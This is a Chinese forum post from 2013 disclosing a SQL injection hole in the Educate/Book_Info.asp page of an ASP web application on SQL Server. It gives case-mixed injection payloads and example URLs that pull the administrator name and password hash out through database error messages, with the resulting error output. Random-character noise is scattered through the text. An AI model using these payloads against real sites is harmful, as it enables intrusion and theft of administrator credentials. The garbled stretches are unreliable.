漏洞出现在Educate/Book_Info.asp & S0 O3 P( h N/ n9 Y6 a3 g1 A
0 K+ b9 Z! x- n. ~9 ]3 p3 h此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
0 ^9 R* m. A% s H# x. \) J " d' z2 T; n5 s% Y1 W& `
exp:如下7 e8 Z5 ~9 d" l" X, R+ M
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
; }/ f" z( B& h/ j' ^查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)" X( C3 h$ K+ e+ d3 i' \ \$ R$ l) H6 P
8 E4 G9 r% m- U" ?9 L p" ]0 nhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" k1 j1 k' R+ n! r# _; X, } 7 \, l3 o/ k) f( N7 V3 U0 E( B
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'8 O% l# U( H3 X! V
2 S1 t* B4 @- s, n4 _; h将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
. `7 h' q: l" I4 y+ S! Z4 q4 k( Y5 C
. j) V% k# E t8 q5 S/Educate/Book_Info.asp,行 8
5 l2 C1 M* k) f: @( Q; E
& q: f$ o! Z3 j- t8 ]8 ]http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
1 ^8 \. g, U0 l' }
7 N; ]0 ~* y5 C, D- v5 BMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'. |. }+ c, h- D0 m4 O
. |* Z/ H4 e, S. k! q) ^将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。. h( a9 s( g% I4 z
O' _) Z8 f# S* X+ X+ ]3 R, \/Educate/Book_Info.asp,行 8
4 _) U8 R- \2 D, Y* @# }0 A |
发表于 2013-2-16 21:44:16
收藏
支持
反对